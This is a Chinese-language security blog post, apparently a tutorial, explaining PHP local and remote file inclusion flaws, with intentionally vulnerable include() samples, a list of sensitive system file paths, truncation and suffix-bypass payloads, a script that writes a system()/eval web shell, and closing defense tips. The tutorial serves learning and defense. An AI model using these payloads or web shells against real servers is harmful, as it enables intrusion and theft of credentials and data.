<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>浅谈文件包含漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="浅谈文件包含漏洞什么是文件包含漏洞以及其原理在web程序中经常遇到这种情况：通过调用本地的php文件来显示页面信息，如show.php?file&#x3D;xxx.php，这一过程主要是通过下列四个函数实现的 1234include()        &#x2F;&#x2F;在包含过程中如果出现错误，会抛出一个警告，但是程序仍会进行下去require()        &#x2F;&#x2F;在包含过程中如果出现错误，会抛出一个警告，并且退出程序">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈文件包含漏洞">
<meta property="og:url" content="http://yoursite.com/2020/05/25/file-inclusion/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="浅谈文件包含漏洞什么是文件包含漏洞以及其原理在web程序中经常遇到这种情况：通过调用本地的php文件来显示页面信息，如show.php?file&#x3D;xxx.php，这一过程主要是通过下列四个函数实现的 1234include()        &#x2F;&#x2F;在包含过程中如果出现错误，会抛出一个警告，但是程序仍会进行下去require()        &#x2F;&#x2F;在包含过程中如果出现错误，会抛出一个警告，并且退出程序">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/05/25/gcKkd4VCw3Xi69o.jpg">
<meta property="og:image" content="https://i.loli.net/2020/05/25/srzVqyf1FcABKgM.jpg">
<meta property="og:image" content="https://i.loli.net/2020/05/25/YshzjmDrRW96n58.jpg">
<meta property="og:image" content="https://i.loli.net/2020/05/25/VSeEJMvA4zpyIb3.jpg">
<meta property="og:image" content="https://i.loli.net/2020/05/25/vHKGMTXJqceILEC.jpg">
<meta property="article:published_time" content="2020-05-25T07:10:09.000Z">
<meta property="article:modified_time" content="2020-05-25T12:21:17.067Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web漏洞">
<meta property="article:tag" content="文件包含">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/05/25/gcKkd4VCw3Xi69o.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.0.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-file-inclusion" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/05/25/file-inclusion/" class="article-date">
  <time datetime="2020-05-25T07:10:09.000Z" itemprop="datePublished">2020-05-25</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      浅谈文件包含漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="浅谈文件包含漏洞"><a href="#浅谈文件包含漏洞" class="headerlink" title="浅谈文件包含漏洞"></a>浅谈文件包含漏洞</h1><h2 id="什么是文件包含漏洞以及其原理"><a href="#什么是文件包含漏洞以及其原理" class="headerlink" title="什么是文件包含漏洞以及其原理"></a>什么是文件包含漏洞以及其原理</h2><p>在web程序中经常遇到这种情况：通过调用本地的php文件来显示页面信息，如show.php?file=xxx.php，这一过程主要是通过下列四个函数实现的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>()        <span class="comment">//在包含过程中如果出现错误，会抛出一个警告，但是程序仍会进行下去</span></span><br><span class="line"><span class="keyword">require</span>()        <span class="comment">//在包含过程中如果出现错误，会抛出一个警告，并且退出程序</span></span><br><span class="line"><span class="keyword">include_once</span>()        <span class="comment">//只包含一次，避免函数重定义，变量重新赋值等问题</span></span><br><span class="line"><span class="keyword">require_once</span>()        <span class="comment">//只包含一次，避免函数重定义，变量重新赋值等问题</span></span><br></pre></td></tr></table></figure>

<p>如果包含的文件可能是用户可控的参数，且没有经过安全校验，则很有可能产生文件包含漏洞，比如下面这段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">&#x27;submit&#x27;</span>]) &amp;&amp; $_GET[<span class="string">&#x27;file&#x27;</span>] != <span class="literal">NULL</span>)</span><br><span class="line">  &#123;</span><br><span class="line">    $filename = $_GET[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span> <span class="string">&#x27;$filename&#x27;</span>;    </span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">    将用户可控参数file赋值给$filename后没有经过任何校验就直接包含，这样攻击者可以通过可控参数包含许多“意料之外”的文件</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">  &#125;</span><br><span class="line"> <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>由此可见，大多数情况下，文件包含函数中包含的代码文件是固定的，因此也不会出现安全问题。但是有些时候，文件包含的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，这种情况下，如果没有做足够的安全考虑，则可能会引发文件包含漏洞。攻击者会指定一个“意想不到”的文件让包含函数去执行，从而造成恶意操作。</p>
<h2 id="文件包含漏洞的分类"><a href="#文件包含漏洞的分类" class="headerlink" title="文件包含漏洞的分类"></a>文件包含漏洞的分类</h2><p>根据不同的配置环境以及不同的攻击效果，文件包含漏洞可以分为<font color='red'>本地文件包含和远程文件包含</font></p>
<h3 id="本地文件包含漏洞"><a href="#本地文件包含漏洞" class="headerlink" title="本地文件包含漏洞"></a>本地文件包含漏洞</h3><p>仅能够对服务器本地的文件进行包含，由于服务器上的文件并不是攻击者所能够控制的，因此该情况下，攻击着更多的会包含一些固定的系统配置文件，从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞，从而形成更大的威力。</p>
<h3 id="远程文件包含漏洞"><a href="#远程文件包含漏洞" class="headerlink" title="远程文件包含漏洞"></a>远程文件包含漏洞</h3><p>能够通过url地址对远程的文件进行包含，这意味着攻击者可以传入任意的代码，这种情况没啥好说的，准备挂彩。 因此，在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数，如果非要这么做，也一定要做严格的白名单策略进行过滤。如果遇到远程文件包含漏洞，我自己的思路有两个：<font color='red'>1. 写入一句话木马，直接拿shell    2. 写入system()函数，获得更多系统信息。</font></p>
<h2 id="文件包含漏洞的利用"><a href="#文件包含漏洞的利用" class="headerlink" title="文件包含漏洞的利用"></a>文件包含漏洞的利用</h2><h3 id="本地文件包含的利用"><a href="#本地文件包含的利用" class="headerlink" title="本地文件包含的利用"></a>本地文件包含的利用</h3><h4 id="实例演示"><a href="#实例演示" class="headerlink" title="实例演示"></a>实例演示</h4><p> <img src="https://i.loli.net/2020/05/25/gcKkd4VCw3Xi69o.jpg" alt="Xnip2020-05-25_18-13-14.jpg"></p>
<p>如图所示，这是一个下拉列表提交栏，通过下拉列表调用相应的php文件。</p>
<p><img src="https://i.loli.net/2020/05/25/srzVqyf1FcABKgM.jpg" alt="Xnip2020-05-25_18-20-10.jpg"></p>
<p>我们在根目录下，有一个flag.php文件，我们看能不能通过filename参数去包含flag.php文件，我们构造URL如下图：</p>
<img src="https://i.loli.net/2020/05/25/YshzjmDrRW96n58.jpg" alt="Xnip2020-05-25_18-21-53.jpg" style="zoom:50%;" />

<p>页面成功显示flag.php信息</p>
<p><img src="https://i.loli.net/2020/05/25/VSeEJMvA4zpyIb3.jpg" alt="Xnip2020-05-25_18-22-59.jpg"></p>
<p>本地文件包含利用成功。</p>
<h4 id="本地文件包含的敏感路径"><a href="#本地文件包含的敏感路径" class="headerlink" title="本地文件包含的敏感路径"></a>本地文件包含的敏感路径</h4><p>常见敏感信息路径</p>
<p>windows系统：</p>
<p>　　c:\boot.ini      //  查看系统版本</p>
<p>　　c:\windows\system32\inetsrc\MetaBase.xml      //IIS配置文件</p>
<p>　　c:\windows\repair\sam      //存储windows系统初次安装的密码</p>
<p>　　c:\programFiles\mysql\my.ini      //MYSQL root密码</p>
<p>　　c:\windows\php.ini     // php 配置信息</p>
<p>Linux/Unix系统：</p>
<pre><code>  /etc/passwd     // 账户信息

  /etc/shadow     // 账户密码文件

  /usr/local/app/apache2/conf/httpd.conf     // Apache2默认配置文件

  /usr/local/app/apache2/conf/extra/httpd-vhost.conf     // 虚拟网站配置

  /usr/local/app/php5/lib/php.ini     // PHP相关配置

  /etc/httpd/conf/httpd.conf     // Apache配置文件

  /etc/my.conf     // mysql 配置文件</code></pre>
<h4 id="本地文件包含限制绕过"><a href="#本地文件包含限制绕过" class="headerlink" title="本地文件包含限制绕过"></a>本地文件包含限制绕过</h4><p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename . <span class="string">&quot;.html&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ol>
<li><p>%00截断</p>
<p>利用条件：magic_quotes_gpc = Off 并且PHP的版本&lt;5.3.4</p>
<p>利用形式：?file=../../../flag.php%00</p>
</li>
<li><p>路径长度截断</p>
<p>条件：windows下目录路径最大长度为256字节，超出部分将丢弃；Linux下目录最大长度为4096字节，超出长度将丢弃</p>
<p>利用形式：?file=text.txt././././.  或 ?file=test.txt…..</p>
</li>
</ol>
<h3 id="远程文件包含漏洞的利用"><a href="#远程文件包含漏洞的利用" class="headerlink" title="远程文件包含漏洞的利用"></a>远程文件包含漏洞的利用</h3><h4 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h4><p>用system()函数构造php文件，或者直接构造一句话木马，具体代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">    利用远程文件包含，在目标靶机中创建一句话木马</span></span><br><span class="line"><span class="comment">    这里我们不适用一句话木马，而是使用system()函数执行系统命令</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    $myfile = fopen(<span class="string">&quot;shell.php&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line">    $text = <span class="string">&#x27;&lt;?php system($_GET[cmd]); ?&gt;&#x27;</span>;    <span class="comment">//system()函数执行命令行命令</span></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">    $text = &#x27;&lt;?php eval(@$_POST[&#x27;cmd&#x27;]); ?&gt;&#x27;;    //一句话木马</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    fwrite($myfile, $text);</span><br><span class="line">    fclose($myfile);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>构造paload，利用filename远程调用shell.php达到getshell的目的。</p>
<img src="https://i.loli.net/2020/05/25/vHKGMTXJqceILEC.jpg" alt="Xnip2020-05-25_20-05-58.jpg" style="zoom:50%;" />

<p>之后的步骤，菜刀连一句话木马。如果用的是system()函数，则构造payload，如：shell.php?cmd=whoami等获得更多系统信息。</p>
<h4 id="远程文件包含限制绕过"><a href="#远程文件包含限制绕过" class="headerlink" title="远程文件包含限制绕过"></a>远程文件包含限制绕过</h4><p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>($_GET[<span class="string">&#x27;filename&#x27;</span>] . <span class="string">&quot;.html&quot;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>拼接了html后缀，拼接到最后远程包含的文件中，拼接后的文件也会多一个HTML后缀。</p>
<p><strong>问号绕过</strong></p>
<p>　　测试：?filename=<a target="_blank" rel="noopener" href="http://xxx/php.txt">http://xxx/php.txt</a>?</p>
<p><strong>#号绕过</strong></p>
<p>　　测试：?filenamr=<a target="_blank" rel="noopener" href="http://xxx/php.txt%23">http://xxx/php.txt%23</a></p>
<p><strong>空格绕过</strong></p>
<p>　　测试：?filename=<a target="_blank" rel="noopener" href="http://xxx/php.txt%20">http://xxx/php.txt%20</a></p>
<h2 id="文件包含的防御"><a href="#文件包含的防御" class="headerlink" title="文件包含的防御"></a>文件包含的防御</h2><ol>
<li>设置allow_url_include=off，不允许通过url调用远程文件，能够有效地防御远程文件包含。</li>
<li>将用户提交的可控参数file赋值给$filename变量时进行严格的安全校验。</li>
<li>对用户输入进行过滤。</li>
</ol>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/05/25/file-inclusion/" data-id="ckdpjqz500004xj9ret5zceoc" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web%E6%BC%8F%E6%B4%9E/" rel="tag">web漏洞</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/05/26/eee/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          关于is_numeric()函数的作用和绕过
        
      </div>
    </a>
  
  
    <a href="/2020/05/23/webbachang/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">WEB漏洞攻防靶场综述</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%B6%E4%BB%96/">其他</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E5%AE%9E%E6%88%98/">实战</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/">页面测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSRF/" rel="tag">SSRF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E9%9D%B6%E5%9C%BA/" rel="tag">WEB靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/" rel="tag">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E6%BC%8F%E6%B4%9E/" rel="tag">web漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/window%E5%85%A5%E4%BE%B5/" rel="tag">window入侵</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag">信息收集</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%B6%E4%BB%96/" rel="tag">其他</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag">工具</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag">靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/" rel="tag">页面测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">SQL注入</a> <a href="/tags/SSRF/" style="font-size: 10px;">SSRF</a> <a href="/tags/WEB%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">WEB靶场</a> <a href="/tags/XXE/" style="font-size: 10px;">XXE</a> <a href="/tags/web%E6%BC%8F%E6%B4%9E/" style="font-size: 20px;">web漏洞</a> <a href="/tags/window%E5%85%A5%E4%BE%B5/" style="font-size: 10px;">window入侵</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">代码审计</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" style="font-size: 15px;">信息收集</a> <a href="/tags/%E5%85%B6%E4%BB%96/" style="font-size: 10px;">其他</a> <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 10px;">命令执行</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" style="font-size: 10px;">文件包含</a> <a href="/tags/%E9%9D%B6%E5%9C%BA/" style="font-size: 10px;">靶场</a> <a href="/tags/%E9%A1%B5%E9%9D%A2%E6%B5%8B%E8%AF%95/" style="font-size: 10px;">页面测试</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/05/Pentester/">Pentester靶场学习writup</a>
          </li>
        
          <li>
            <a href="/2020/06/28/information-1/">信息收集脑图</a>
          </li>
        
          <li>
            <a href="/2020/06/18/window-ruqin/">window入侵试验</a>
          </li>
        
          <li>
            <a href="/2020/06/14/information/">信息收集笔记</a>
          </li>
        
          <li>
            <a href="/2020/06/03/sql-test/">记录一次最基本的SQL注入实战</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>